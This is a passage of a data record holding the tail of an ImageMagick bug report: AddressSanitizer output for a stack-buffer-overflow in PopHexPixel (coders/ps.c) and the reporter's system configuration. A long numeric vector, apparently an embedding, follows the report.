<== Memory access at offset 2752 overflows this variable` ` [2784, 6880) 'buffer'` ` [6912, 11008) 'date'` ` [11040, 15136) 'page_geometry'` `HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext` ` (longjmp and C++ exceptions *are* supported)` `SUMMARY: AddressSanitizer: stack-buffer-overflow coders/ps.c:1184 PopHexPixel` `Shadow bytes around the buggy address:` ` 0x100001b83a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` ` 0x100001b83a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` ` 0x100001b83a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` ` 0x100001b83a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` ` 0x100001b83a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` `=>0x100001b83a70: 00 00 00 00 00 00 00 00[f2]f2 f2 f2 00 00 00 00` ` 0x100001b83a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` ` 0x100001b83a90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` ` 0x100001b83aa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` ` 0x100001b83ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` ` 0x100001b83ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` `Shadow byte legend (one shadow byte represents 8 application bytes):` ` Addressable: 00` ` Partially addressable: 01 02 03 04 05 06 07 ` ` Heap left redzone: fa` ` Heap right redzone: fb` ` Freed heap region: fd` ` Stack left redzone: f1` ` Stack mid redzone: f2` ` Stack right redzone: f3` ` Stack partial redzone: f4` ` Stack after return: f5` ` Stack use after scope: f8` ` Global redzone: f9` ` Global init order: f6` ` Poisoned by user: f7` ` Container overflow: fc` ` Array cookie: ac` ` Intra object redzone: bb` ` ASan internal: fe` `==80022==ABORTING` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-35 Q16 x86_64 2019-03-22 https://imagemagick.org Copyright: ? 1999-2019 ImageMagick Studio LLC License: https://imagemagick.org/script/license.php Features: Cipher DPC HDRI OpenMP Delegates (built-in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff webp wmf x xml zlib - Environment (Operating system, version and so on): Distributor ID: Ubuntu Description: Ubuntu 16.04.2 LTS Release: 16.04 Codename: xenial - Additional information: <!-- Thanks for reporting the issue to ImageMagick! --> --- end body ---
5,109
[ -0.015256437472999096, 0.012569149024784565, -0.007148580625653267, 0.04820035398006439, 0.05027659609913826, 0.04525682330131531, -0.012680846266448498, 0.02906738966703415, -0.004198477137833834, 0.028725730255246162, 0.003485589986667037, 0.0016729846829548478, 0.012076370418071747, 0.02147202380001545, -0.018107986077666283, -0.016609936952590942, -0.016649359837174416, 0.026294687762856483, -0.02475721575319767, 0.003485589986667037, 0.008988289162516594, -0.042549822479486465, -0.04628180339932442, 0.039080660790205, -0.02042076177895069, 0.01721441186964512, -0.002603515749797225, 0.0023587688338011503, -0.012148644775152206, 0.038265932351350784, 0.017266975715756416, 0.040026795119047165, -0.023062055930495262, 0.0277270320802927, 0.031169913709163666, -0.0019497622270137072, 0.022943789139389992, 0.08436376601457596, -0.008699191734194756, 0.01563752070069313, -0.003639994189143181, -0.0403684563934803, 0.014389146119356155, 0.0032277023419737816, -0.005703095346689224, 0.013397018425166607, 0.004940930753946304, -0.039290912449359894, -0.053929731249809265, 0.015072466805577278, 0.026452375575900078, -0.01205665897578001, -0.03361409902572632, -0.037004418671131134, -0.00002379198485868983, -0.025979308411478996, 0.04252354055643082, 0.02616328001022339, -0.0014282377669587731, -0.01046005543321371, -0.027937283739447594, 0.03053915686905384, 0.031432729214429855, 0.018331378698349, -0.026294687762856483, -0.02827894315123558, 0.01488849613815546, 0.01795029640197754, -0.011590162292122841, 0.008896303363144398, 0.011347057297825813, -0.018226252868771553, 0.03479676693677902, 0.03871271759271622, -0.013889797031879425, 0.009513920173048973, 0.0708024874329567, 0.006971179973334074, -0.03224745765328407, 0.01859419420361519, -0.05127529799938202, 0.036978136748075485, -0.005322013050317764, 0.048857394605875015, 0.03130132332444191, 0.005916633177548647, -0.018094845116138458, -0.08036896586418152, -0.039501164108514786, -0.014914777129888535, 0.013613840565085411, 0.011806984432041645, 0.0208544060587883, -0.0008656484424136579, 0.009073703549802303, 0.029172515496611595, -0.020631013438105583, -0.028646884486079216, -0.016241995617747307, 0.002467180136591196, -0.01994769275188446, -0.029146235436201096, -0.007529662922024727, 0.004343025386333466, 0.01048633735626936, -0.00532529829069972, -0.009198540821671486, -0.01783202961087227, 0.014559976756572723, 0.1211053654551506, 0.009270815178751945, -0.007227424997836351, -0.02654436230659485, 0.035453807562589645, -0.0019957548938691616, 0.004369306843727827, 0.0068463427014648914, -0.004645263310521841, -0.046570900827646255, -0.03884412348270416, -0.030223777517676353, -0.028173817321658134, 0.009067133069038391, 0.010026410222053528, -0.020144805312156677, 0.019645456224679947, -0.024034474045038223, -0.020578451454639435, -0.027963565662503242, 0.01007897313684225, -0.04239213466644287, -0.01566380076110363, 0.016504811123013496, -0.01933007687330246, 0.010506047867238522, -0.011018537916243076, -0.03406088426709175, 0.052431683987379074, 0.0290411077439785, 0.020105382427573204, -0.060762934386730194, -0.02358768694102764, 0.026531221345067024, 0.0008204770274460316, -0.0028466200456023216, 0.026202701032161713, -0.02801612764596939, -0.019001558423042297, -0.005607824772596359, 0.004934360273182392, 0.00020419529755599797, -0.003194850403815508, 0.018554771319031715, 0.011406190693378448, 0.04341711476445198, -0.010926553048193455, 0.03808195888996124, 0.05571687966585159, -0.0138766560703516, -0.0018594193970784545, -0.007319410797208548, -0.04362736642360687, 0.016557374969124794, -0.02516457997262478, 0.00043693071347661316, -0.03148529306054115, 0.0138766560703516, 0.0110316788777709, -0.016504811123013496, 0.011215649545192719, 0.007891034707427025, -0.006130170542746782, -0.005818077363073826, -0.004724108148366213, -0.054139986634254456, 0.0061794486828148365, 0.013048787601292133, 0.011241931468248367, -0.03511214628815651, -0.022050216794013977, -0.023062055930495262, -0.0008180130971595645, -0.006964609958231449, -0.023246027529239655, 0.023889925330877304, -0.013771530240774155, 0.007910745218396187, -0.01390293799340725, 0.0023259168956428766, -0.02675461396574974, -0.017858311533927917, -0.02323288656771183, 0.024599527940154076, -0.047359347343444824, 0.03237886354327202, -0.008442946709692478, -0.03164298087358475, -0.018134266138076782, 0.03582174703478813, -0.023035775870084763, 0.023456279188394547, -0.013180195353925228, -0.02299635298550129, -0.004655119031667709, -0.017122427001595497, 0.02149830386042595, -0.026268405839800835, 0.0182788148522377, 0.03810824081301689, -0.0049573564901947975, -0.012674275785684586, -0.017937155440449715, 0.027096273377537727, 0.011734710074961185, -0.03463907912373543, -0.00477338582277298, -0.017871450632810593, 0.01897527649998665, -0.035190992057323456, 0.019671738147735596, 0.022983212023973465, -0.017845170572400093, -0.022431299090385437, -0.04751703515648842, -0.02484920248389244, -0.018502209335565567, -0.006097318604588509, 0.003393604652956128, -0.027227681130170822, -0.008390383794903755, 0.042076755315065384, -0.04310173541307449, 0.031222477555274963, -0.004326599650084972, 0.02437613345682621, -0.010749151930212975, -0.01503304485231638, 0.009500779211521149, -0.013055358082056046, 0.023127760738134384, 0.0033558248542249203, -0.006110459566116333, -0.005992192309349775, -0.01599232107400894, 0.008173560723662376, 0.059448856860399246, -0.018554771319031715, -0.0018643471412360668, -0.009244534187018871, 0.024928046390414238, 0.000673464615829289, -0.0008919299580156803, 0.015716364607214928, -0.0007547731511294842, 0.02126177027821541, -0.02508573606610298, 0.008528362028300762, -0.019264373928308487, -0.010210380889475346, -0.007720204070210457, 0.03337756544351578, -0.00043446681229397655, -0.013088209554553032, 0.029119953513145447, 0.01639968529343605, -0.015466690063476562, 0.0024326855782419443, 0.005404143128544092, -0.018515348434448242, -0.010065832175314426, 0.022181624546647072, -0.012792542576789856, 0.006294430233538151, -0.043075453490018845, 0.014362865127623081, 0.0020302494522184134, 0.00570638058707118, 0.029093671590089798, 0.022365596145391464, -0.019001558423042297, 0.0038863837253302336, -0.010348359122872353, -0.005926488898694515, 0.01728011667728424, 0.01607116498053074, -0.02804240956902504, 0.012036948464810848, -0.012089511379599571, -0.026412954553961754, -0.026938585564494133, -0.013837234117090702, 0.013048787601292133, -0.020289354026317596, -0.011734710074961185, 0.017818888649344444, 0.0056603881530463696, -0.025295987725257874, 0.00988843198865652, -0.0214457418769598, 0.010381210595369339, -0.02080184407532215, -0.01424459833651781, -0.030959662050008774, 0.041314590722322464, -0.036978136748075485, -0.0018232822185382247, -0.008962007239460945, 0.035190992057323456, -0.021787401288747787, -0.005594684276729822, 0.032221175730228424, -0.032930776476860046, -0.0033476119861006737, -0.01349557377398014, -0.030696846544742584, -0.011333916336297989, 0.0021698700729757547, 0.004458007402718067, -0.004848945420235395, -0.0014241313328966498, -0.040315892547369, -0.002542739501222968, -0.041288308799266815, 0.022523285821080208, 0.031669262796640396, 0.02223418839275837, -0.03358781710267067, 0.029409050941467285, -0.06733331829309464, 0.017227552831172943, 0.009566483087837696, -0.033482689410448074, -0.00739168468862772, -0.03592687472701073, 0.03760889172554016, -0.02232617326080799, -0.0220633577555418, 0.024836061522364616, 0.017871450632810593, 0.036741603165864944, 0.001636847504414618, 0.024428697302937508, -0.006567101459950209, -0.027464216575026512, 0.012063229456543922, -0.009375941939651966, 0.011255072429776192, 0.006859483662992716, 0.013357595540583134, 0.005128186661750078, 0.0009338161908090115, 0.044599782675504684, 0.013771530240774155, 0.03868643566966057, 0.016320839524269104, -0.0014783369842916727, -0.005108475685119629, -0.011478465050458908, 0.0027201399207115173, -0.04018448293209076, 0.02346942014992237, -0.01739838346838951, -0.01816054806113243, 0.006636090576648712, 0.01239174883812666, 0.0019366213819012046, 0.01854163035750389, 0.0017378672491759062, -0.01942206174135208, 0.0033426841255277395, -0.02854175865650177, 0.06733331829309464, -0.036189690232276917, 0.0013945645187050104, -0.024888623505830765, -0.025072595104575157, 0.011228790506720543, -0.0010734369279816747, -0.03855502977967262, 0.008587495423853397, -0.03963256999850273, 0.03608456254005432, 0.06134112924337387, -0.04071011394262314, 0.02161657251417637, 0.01607116498053074, -0.02030249498784542, 0.02875201217830181, 0.010170958004891872, -0.017858311533927917, -0.03558521345257759, 0.036242250353097916, -0.017122427001595497, -0.05374576151371002, 0.0014594470849260688, 0.05892322584986687, 0.008548072539269924, -0.051117606461048126, 0.014441709965467453, -0.052405402064323425, 0.022418158128857613, -0.017976578325033188, -0.006379845552146435, 0.024218445643782616, 0.004467862658202648, 0.029855836182832718, 0.011478465050458908, -0.024980610236525536, 0.013955500908195972, -0.03132760152220726, 0.01730639860033989, 0.011892399750649929, -0.03256283700466156, -0.0006135098519735038, 0.03182695060968399, 0.012017237022519112, -0.0016853041015565395, 0.0246389489620924, -0.012654564343392849, 0.005262879654765129, -0.016793908551335335, -0.0012771189212799072, 0.001253301277756691, 0.0327468067407608, 0.012115792371332645, 0.011688717640936375, -0.0022454296704381704, -0.0015259722713381052, 0.038528747856616974, -0.028857138007879257, -0.008357531391084194, -0.034980736672878265, -0.00985557958483696, 0.00712886918336153, -0.02639981359243393, -0.020788703113794327, -0.0429440476000309, -0.04302288964390755, -0.04044729843735695, -0.009500779211521149, -0.010906841605901718, 0.034455105662345886, -0.02314090169966221, -0.02639981359243393, -0.021747980266809464, -0.017503509297966957, -0.04063127189874649, 0.015138170681893826, 0.0002482374256942421, -0.03356153517961502, -0.012122362852096558, 0.027832157909870148, 0.004352881107479334, -0.013285321183502674, 0.017148708924651146, 0.01333131454885006, -0.04389018192887306, -0.02637353166937828, 0.04260238632559776, 0.009336519055068493, 0.006583527196198702, -0.0008130853530019522, -0.03897553309798241, -0.02147202380001545, 0.026886021718382835, 0.029435331001877785, 0.004743819124996662, -0.004684685729444027, 0.020841266959905624, -0.012779401615262032, 0.016294559463858604, 0.038239650428295135, 0.020276213064789772, 0.0015095463022589684, -0.005216886755079031, 0.026176419109106064, 0.014323442243039608, -0.001716513535939157, 0.02275981940329075, -0.05159067362546921, 0.006586812436580658, -0.06381159275770187, -0.025598226115107536, 0.01883072778582573, 0.03760889172554016, 0.0011292851995676756, 0.0010085543617606163, 0.004691256210207939, -0.02170855738222599, 0.030486593022942543, 0.045072853565216064, 0.029750710353255272, -0.028725730255246162, -0.03992166742682457, 0.011695288121700287, 0.027411652728915215, -0.014218316413462162, 0.0057129510678350925, 0.05377204343676567, 0.002798984758555889, -0.009901572950184345, -0.013357595540583134, 0.011754421517252922, 0.003955372609198093, 0.0340346023440361, -0.026071293279528618, -0.013942359946668148, -0.007943597622215748, -0.02933020517230034, -0.03495445474982262, 0.04249725863337517, -0.019106684252619743, 0.013344455510377884, -0.018370801582932472, 0.0017197986599057913, -0.01992141269147396, 0.04741191118955612, -0.005049342289566994, 0.0259004645049572, 0.0008044617134146392, -0.015230156481266022, -0.012142074294388294, 0.017726903781294823, 0.02851547673344612, 0.017818888649344444, -0.0021468738559633493, 0.046045269817113876, -0.011682147160172462, 0.0066032386384904385, -0.04349596053361893, 0.006153167225420475, 0.0007453282014466822, -0.02504631318151951, 0.04441581293940544, -0.004599270410835743, 0.005630821455270052, -0.029855836182832718, -0.0069448985159397125, 0.011465324088931084, -0.003741835243999958, -0.006294430233538151, 0.03753004968166351, -0.010361499153077602, -0.014297161251306534, -0.03582174703478813, 0.02777959406375885, -0.01992141269147396, 0.015309000387787819, 0.01871246099472046, -0.018554771319031715, 0.006990891415625811, -0.009947565384209156, 0.012647993862628937, 0.009822728112339973, 0.0011301065096631646, 0.005880495999008417, 0.0005588934873230755, -0.009566483087837696, 0.022943789139389992, 0.018226252868771553, 0.011958103626966476, -0.007431107107549906, 0.002800627378746867, 0.016097446903586388, -0.010282655246555805, -0.009198540821671486, 0.00320142088457942, 0.030144933611154556, -0.03668903931975365, -0.012720268219709396, 0.022299891337752342, 0.003099579829722643, -0.0025000320747494698, 0.013285321183502674, 0.0012179854093119502, 0.01553239393979311, -0.0005925667355768383, -0.025939885526895523, -0.039264630526304245, -0.015795208513736725, 0.01806856319308281, -0.00638641556724906, 0.013534996658563614, -0.006008618511259556, 0.04089408740401268, -0.019908271729946136, 0.0017953581409528852, 0.033719222992658615, -0.011445613577961922, -0.028857138007879257, -0.00784504134207964, 0.01220120768994093, 0.0010118394857272506, 0.0028482626657932997, 0.013613840565085411, -0.02830522507429123, 0.028935981914401054, -0.008055293932557106, 0.013088209554553032, 0.011379909701645374, -0.01678076758980751, 0.036505065858364105, 0.0006890692748129368, -0.029146235436201096, -0.011452184058725834, 0.00739168468862772, 0.022575847804546356, -0.005772084463387728, 0.010000128298997879, 0.033456407487392426, -0.00009157476597465575, 0.026767754927277565, 0.031932078301906586, 0.01330503262579441, 0.03608456254005432, -0.013692685402929783, 0.017845170572400093, 0.006530964281409979, -0.025387974455952644, 0.016859611496329308, 0.0064751161262393, -0.0630231499671936, 0.0005285054794512689, -0.0019169102888554335, 0.013771530240774155, 0.004885082598775625, -0.019868848845362663, -0.007036883849650621, -0.011885829269886017, -0.031169913709163666, -0.025453677400946617, 0.027884719893336296, 0.018843868747353554, -0.022339314222335815, -0.04113062098622322, 0.0366101935505867, 0.03258911892771721, 0.003603857010602951, -0.02220790646970272, 0.011465324088931084, -0.008692621253430843, 0.0024951042141765356, -0.0008508650353178382, 0.02182682417333126, -0.02704371139407158, -0.0065605309791862965, -0.0008607206400483847, 0.014507413841784, 0.0258479006588459, 0.018502209335565567, -0.059238605201244354, -0.004678115248680115, 0.008541502058506012, 0.006415982265025377, 0.022273611277341843, 0.007923886179924011, 0.021419459953904152, 0.04446837678551674, -0.035007018595933914, -0.030486593022942543, -0.01745094731450081, -0.026912303641438484, -0.009461356326937675, 0.02049960568547249, 0.022786101326346397, -0.010210380889475346, -0.021918809041380882, -0.02930392324924469, 0.024954328313469887, 0.020867547020316124, 0.01821311190724373, 0.01296337228268385, -0.012608571909368038, 0.012529727071523666, -0.010525759309530258, -0.006389700807631016, 0.03140644729137421, 0.01287795789539814, -0.01287795789539814, 0.023035775870084763, 0.024271007627248764, -0.02587418258190155, 0.008764895610511303, -0.009277385659515858, -0.029382769018411636, 0.005824647843837738, 0.007142010144889355, -0.00921168178319931, -0.017490368336439133, -0.022628411650657654, 0.04191906750202179, -0.026912303641438484, -0.010519188828766346, 0.007588796317577362, 0.010302365757524967, 0.0003465878835413605, 0.00763478921726346, -0.005384431686252356, -0.009632186964154243, -0.016938457265496254, -0.04601898789405823, 0.012647993862628937, 0.0010101969819515944, 0.013626981526613235, 0.015190733596682549, 0.029119953513145447, -0.0021288052666932344, 0.004770100582391024, -0.023154042661190033, 0.0024540394078940153, -0.009185400791466236, 0.002774345688521862, -0.028620604425668716, 0.010230091400444508, 0.02487548254430294, -0.018397081643342972, 0.007937027141451836, -0.0016853041015565395, -0.000327287387335673, -0.00039258060860447586, -0.002409689361229539, -0.021655993536114693, -0.05781939998269081, -0.053193848580121994, -0.004264181014150381, 0.012050088495016098, -0.00928395614027977, 0.0032704100012779236, 0.017766324803233147, 0.021196067333221436, 0.01578206941485405, -0.01538784522563219, -0.015177592635154724, 0.011018537916243076, -0.003298334078863263, 0.01663621887564659, 0.004017791245132685, -0.015506112016737461, 0.0034790197387337685, 0.005676813889294863, 0.01666250079870224, -0.01628141850233078, 0.022142203524708748, -0.033719222992658615, 0.012240630574524403, -0.0058936369605362415, 0.023745376616716385, 0.011491606011986732, -0.03739864006638527, 0.03053915686905384, 0.0038962392136454582, 0.03140644729137421, 0.0026248693466186523, -0.02528284676373005, -0.023600827902555466, 0.00928395614027977, -0.004921219311654568, -0.005072338506579399, 0.02375851757824421, -0.008442946709692478, -0.0022191479802131653, 0.003413315862417221, 0.00006288065196713433, 0.011944962665438652, 0.0082261236384511, 0.003607142250984907, 0.021156644448637962, -0.01994769275188446, 0.025151439011096954, 0.0068923356011509895, 0.02003967948257923, -0.004352881107479334, -0.030223777517676353, 0.015479831025004387, 0.029356487095355988, -0.028935981914401054, 0.022956930100917816, -0.0006385594606399536, 0.018318237736821175, 0.021012095734477043, -0.034455105662345886, -0.00959276407957077, -0.051380421966314316, 0.033745504915714264, -0.016491670161485672, -0.0025558804627507925, 0.027963565662503242, -0.010420633479952812, -0.02432357147336006, 0.009395652450621128, -0.011609872803092003, 0.0032260597217828035, 0.046124111860990524, -0.006330567412078381, -0.025006890296936035, -0.021892527118325233, -0.006898906081914902, 0.010006698779761791, -0.005266164895147085, -0.01718813180923462, -0.005348294507712126, 0.01982942596077919, -0.018357660621404648, -0.015729505568742752, -0.015492971055209637, -0.013469292782247066, -0.035769183188676834, 0.025598226115107536, -0.0227335374802351, 0.017358960583806038, 0.003449453040957451, -0.010893700644373894, 0.0009962348267436028, 0.011110523715615273, 0.008173560723662376, -0.03687300905585289, 0.018239393830299377, -0.02099895477294922, -0.0005515018128789961, -0.0013231115881353617, -0.02751677855849266, 0.004592700395733118, -0.016557374969124794, -0.04236585274338722, -0.015795208513736725, -0.014980481006205082, -0.011590162292122841, 0.006107174325734377, -0.0023045630659908056, 0.033982038497924805, 0.0029024682007730007, -0.03792427107691765, 0.005436995066702366, 0.03059171885251999, -0.0018314952030777931, 0.020026538521051407, -0.016820190474390984, -0.0011654222616925836, -0.02297007106244564, 0.02798984758555889, 0.0019201954128220677, -0.010131536051630974, -0.01613686978816986, -0.0007404004572890699, -0.0029763851780444384, -0.03466536104679108, -0.0340871661901474, 0.015190733596682549, -0.009415363892912865, -0.0014356294414028525, 0.028673166409134865, 0.01880444586277008, -0.03884412348270416, 0.024546964094042778, -0.005837788339704275, -0.005601254757493734, 0.0013378949370235205, -0.0008804317913018167, 0.004970497451722622, -0.013042217120528221, 0.016938457265496254, 0.007680781651288271, -0.014809651300311089, 0.0021452312357723713, 0.03658391162753105, 0.002672504633665085, 0.0025361692532896996, -0.0012155214790254831, 0.0015259722713381052, -0.017529791221022606, -0.010821426287293434, 0.0050953347235918045, 0.05335154011845589, -0.03227373957633972, -0.021458882838487625, -0.017700621858239174, -0.003952087368816137, -0.030197497457265854, 0.01657051406800747, 0.044862598180770874, -0.0023801224306225777, 0.014178894460201263, 0.02185310609638691, 0.011011967435479164, 0.0014339868212118745, -0.022562706843018532, -0.007115728687494993, -0.02428414858877659, -0.022680973634123802, 0.015545534901320934, 0.004448151681572199, -0.0026511510368436575, -0.017910873517394066, -0.0042871772311627865, 0.031143631786108017, 0.027411652728915215, -0.019868848845362663, -0.013121061958372593, 0.004865371156483889, -0.011767562478780746, -0.00043610940338112414, 0.01733268052339554, 0.005216886755079031, 0.009270815178751945, -0.00624843779951334, -0.004464577883481979, 0.02199765481054783, -0.005082194227725267, -0.004208332393318415, -0.006291144993156195, 0.023679673671722412, -0.030670564621686935, 0.004228043835610151, -0.03214232996106148, -0.009586193598806858, 0.016215713694691658, -0.0068069202825427055, -0.01695159822702408, 0.0047109671868383884, 0.011360198259353638, -0.009612475521862507, 0.0014939416432753205, 0.003066727891564369, 0.01918552815914154, 0.005834503099322319, -0.02432357147336006, -0.02951417677104473, 0.013127632439136505, 0.012943661771714687, -0.018291955813765526, -0.009763594716787338, -0.006130170542746782, 0.016110587865114212, 0.016412826254963875, 0.012969942763447762, -0.03009236976504326, -0.013318173587322235, 0.014428569003939629, -0.036978136748075485, -0.05398229509592056, 0.0132590401917696, -0.0088568814098835, 0.0069383280351758, -0.0028811146039515734, 0.006977750454097986, 0.00029772063135169446, -0.0047635301016271114, -0.01695159822702408, 0.0031439298763871193, 0.0030601576436311007, -0.04977724701166153, -0.006251722574234009, -0.0002979259588755667, -0.014113190583884716, -0.015230156481266022, 0.0214457418769598, -0.01462568063288927, 0.006958039477467537, 0.006826631724834442, 0.0005806579138152301, 0.023272309452295303, 0.007989590056240559, -0.02930392324924469, -0.006642660591751337, 0.007109158206731081, -0.005282590631395578, -0.05248424783349037, -0.016491670161485672, -0.01906726136803627, -0.00551583943888545, -0.006057896185666323, 0.010670308023691177, 0.012864816933870316, 0.03590059280395508, -0.0021288052666932344, 0.029619302600622177, 0.008291827514767647, -0.026504939422011375, -0.009803016670048237, 0.009743883274495602, -0.015979180112481117, -0.008732044138014317, 0.03227373957633972, -0.0010947906412184238, 0.00837724283337593, -0.008732044138014317, 0.019435202702879906, 0.028226381167769432, -0.01258228998631239, -0.015085607767105103, 0.014730806462466717, -0.014349724166095257, 0.009237963706254959, -0.050618257373571396, 0.00847579911351204, -0.0005937987007200718, -0.019527189433574677, -0.016793908551335335, -0.029698146507143974, -0.02220790646970272, -0.023022634908556938, 0.04465234652161598, 0.008304968476295471, -0.009067133069038391, -0.01428402028977871, 0.029645584523677826, 0.0036728461273014545, -0.011905540712177753, -0.009099985472857952, -0.005916633177548647, 0.0017674339469522238, -0.013121061958372593, 0.02249700389802456, -0.02099895477294922, 0.035716623067855835, -0.003998080268502235, -0.0048095230013132095, -0.0022470722906291485, -0.007713633589446545, 0.044074151664972305, -0.02232617326080799, 0.02159029059112072, -0.015203874558210373, -0.01268741674721241, -0.006317426450550556, 0.011655866168439388, -0.014638821594417095, 0.0022421444300562143, 0.0034560232888907194, 0.016938457265496254, 0.012102652341127396, -0.005272735375910997, 0.02080184407532215, -0.006143311504274607, -0.020289354026317596, 0.005019775126129389, 0.01844964548945427, -0.034455105662345886, -0.03230002149939537, 0.0015169379767030478, 0.04425812512636185, -0.018291955813765526, -0.00524316867813468, -0.010611174628138542, 0.007976449094712734, 0.016741344705224037, 0.0009773450437933207, -0.020000256597995758, -0.00005125414827489294, -0.040762677788734436, 0.00423789955675602, -0.01098568644374609, 0.0379505529999733, -0.0021271626465022564, -0.039290912449359894, -0.014100049622356892, -0.0022667832672595978, -0.015821490436792374, 0.000055796954256948084, -0.00036876293597742915, -0.01604488305747509, -0.00015409609477501363, -0.01795029640197754, -0.02561136707663536, -0.016820190474390984, -0.02534855157136917, -0.013022505678236485, 0.019579751417040825, 0.0023242742754518986, -0.01569008268415928, 0.03456023335456848, 0.0040933508425951, -0.007746485527604818, 0.00007822866609785706, 0.03437626361846924, -0.02237873710691929, 0.015164452604949474, -0.001503797248005867, -0.012503445148468018, -0.030644282698631287, -0.011708429083228111, -0.008686050772666931, -0.0036137124989181757, -0.005887066479772329, -0.026912303641438484, 0.020381338894367218, 0.00013551421579904854, -0.026504939422011375, 0.021104082465171814, 0.004937645513564348, -0.01178070344030857, -0.022483862936496735, 0.013213047757744789, -0.01706986501812935, -0.00285319029353559, 0.013968641869723797, 0.018475927412509918, 0.07153836637735367, -0.02616328001022339, -0.001713228295557201, -0.030880816280841827, 0.019198669120669365, -0.012641423381865025, 0.00006601185305044055, -0.004444866441190243, -0.005831217858940363, 0.0013165412237867713, 0.02575591579079628, -0.025690210983157158, -0.004747104365378618, 0.0278058759868145, 0.008423235267400742, 0.003935661632567644, -0.00806843489408493, 0.011097382754087448, 0.008587495423853397, -0.010282655246555805, 0.001098897191695869, -0.00008233515836764127, -0.003639994189143181, -0.03232630342245102, 0.02068357728421688, -0.025966167449951172, -0.0163734033703804, -0.02194509096443653, -0.01909354329109192, -0.021419459953904152, -0.011195939034223557, -0.005124901421368122, -0.022155342623591423, 0.002677432494238019, -0.009060562588274479, -0.005019775126129389, 0.02777959406375885, -0.001077543362043798, -0.00833125039935112, -0.014454849995672703, 0.00011405780242057517, -0.015453549101948738, -0.005351579748094082, -0.013088209554553032, 0.0024162596091628075, -0.013981782831251621, 0.01478336937725544, -0.01212893333286047, -0.0029336775187402964, 0.011846407316625118, -0.003449453040957451, -0.02511201798915863, 0.009119696915149689, -0.007969878613948822, 0.007398255169391632, 0.022838663309812546, -0.004086780361831188, -0.025322269648313522, -0.0035381531342864037, 0.017411524429917336, -0.015979180112481117, 0.013272181153297424, -0.01678076758980751, -0.0019218380330130458, -0.015887195244431496, 0.005006634630262852, -0.004730678163468838, -0.0029418906196951866, -0.03224745765328407, 0.03992166742682457, 0.01706986501812935, -0.015125029720366001, -0.008350960910320282, -0.0030585150234401226, 0.009185400791466236, 0.019132966175675392, -0.013692685402929783, 0.031432729214429855, -0.015979180112481117, -0.020052820444107056, 0.017766324803233147, 0.022194765508174896, -0.016991019248962402, 0.015558674931526184, -0.008193272165954113, 0.022812381386756897, -0.016977878287434578, -0.018988417461514473, 0.012293193489313126, -0.015742646530270576, -0.006951468996703625, -0.006951468996703625, 0.018607335165143013, 0.00720114354044199, 0.0063699898310005665, 0.009461356326937675, 0.032221175730228424, -0.020407620817422867, -0.007168291602283716, -0.001716513535939157, 0.016202572733163834, 0.0023407002445310354, 0.01856791228055954, -0.0029320348985493183, -0.024165881797671318, 0.0045729889534413815, -0.01625513657927513, 0.018738742917776108, -0.00825897604227066, -0.014073767699301243, -0.04391646385192871, -0.02099895477294922, 0.013180195353925228, -0.002817053347826004, -0.008134138770401478, 0.02699114754796028, 0.00720114354044199, 0.0015933187678456306, -0.033955756574869156, -0.010433773510158062, -0.025033172219991684, -0.03187951445579529, 0.039527446031570435, -0.018909571692347527, 0.0035184419248253107, 0.003912665415555239, 0.012023807503283024, -0.03758260980248451, 0.018765024840831757, 0.028436632826924324, 0.0378454253077507, 0.005486272741109133, -0.0032457709312438965, -0.020814985036849976, 0.0011038249358534813, -0.04549335688352585, 0.027569342404603958, 0.004412014503031969, -0.01478336937725544, -0.0005769620765931904, -0.014205175451934338, 0.006307571195065975, 0.005443565081804991, 0.011997525580227375, 0.00021990262030158192, -0.009901572950184345, 0.002406404120847583, 0.030696846544742584, 0.02323288656771183, 0.01892271265387535, -0.014717665500938892, -0.03232630342245102, -0.00020758314349222928, 0.0417613759636879, -0.00109807588160038, 0.004986923187971115, 0.015913475304841995, -0.018436504527926445, 0.017004160210490227, -0.0021435886155813932, 0.011425902135670185, 0.019001558423042297, 0.012818824499845505, -0.017411524429917336, -0.0005572509253397584, 0.018410222604870796, -0.015072466805577278, -0.024928046390414238, -0.011741280555725098, -0.039264630526304245, 0.034928176552057266, -0.005009919870644808, -0.016005462035536766, 0.022129062563180923, 0.010230091400444508, -0.0023554835934191942, -0.009224822744727135, 0.01944834366440773, 0.04693884029984474, -0.014389146119356155, -0.00860720593482256, 0.01613686978816986, 0.0070828767493367195, 0.010749151930212975, -0.0027119270525872707, -0.01889643259346485, -0.022575847804546356, 0.003393604652956128, -0.024862343445420265, 0.010979115962982178, -0.009145977906882763, 0.028331506997346878, -0.005673528648912907, -0.004362736828625202, -0.006984320934861898, -0.02182682417333126, -0.0013321458827704191, -0.017963437363505363, -0.012897668406367302, 0.01678076758980751, -0.003889668732881546, -0.011563880369067192, -0.021839965134859085, 0.010887130163609982, -0.0258479006588459, -0.01868617907166481, 0.021550867706537247, 0.008009301498532295, -0.019408922642469406, 0.0025197432842105627, -0.0009001429425552487, 0.019671738147735596, -0.011425902135670185, 0.026215841993689537, 0.002347270492464304, 0.01889643259346485, -0.009362800978124142, -0.01818682998418808, 0.005282590631395578, -0.026084434241056442, -0.02208963967859745, 0.020433902740478516, 0.01216178573668003, 0.0070303138345479965, 0.0038075391203165054, 0.016491670161485672, 0.03839733824133873, -0.014546835795044899, -0.008633487857878208, 0.008390383794903755, -0.01251001562923193, -0.00004134723712923005, -0.008199842646718025, 0.003175139194354415, 0.01193839218467474, -0.02572963386774063, -0.014678243547677994, 0.009822728112339973, -0.010262943804264069, 0.02314090169966221, 0.016031743958592415, 0.01541412714868784, -0.02513829804956913, -0.006146596744656563, 0.011301064863801003, -0.00012257877096999437, 0.013653263449668884, -0.014573117718100548, -0.0036564201582223177, 0.024560105055570602, -0.04060498997569084, -0.011577021330595016, -0.0030026666354388, -0.010381210595369339, 0.006291144993156195, 0.03148529306054115, 0.0020072530023753643, 